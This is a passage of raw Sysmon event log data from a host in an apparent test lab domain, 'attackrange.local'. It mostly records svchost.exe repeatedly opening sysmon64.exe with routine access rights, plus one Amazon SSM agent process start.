Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\services.exe+12bee|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+20a11|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001550Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.220{10ACEC4A-8551-5FCF-3000-000000009101}1548C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe-----"C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=DA51CF0FEA01D0A4ACD1E9A8E3EA44AA,SHA256=E86989BAC9D36028AFD6C03714261C6226DE56BE632F873E9B62330368B0D7D9,IMPHASH=F0070935B15A909B9DC00BE7997E6112{10ACEC4A-853E-5FCF-0A00-000000009101}852C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001549Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.500{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001548Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.500{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001547Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.500{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001546Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.500{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001545Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.500{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001544Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.500{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001543Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.500{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001542Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.499{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001541Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.499{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001540Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.497{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001539Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.497{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001538Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.497{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001537Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.497{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001536Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.497{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001535Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.497{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001534Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.497{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001533Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.497{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001532Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.497{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001531Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.494{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001530Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.494{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001529Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.494{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001528Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.494{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001527Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.494{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001526Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 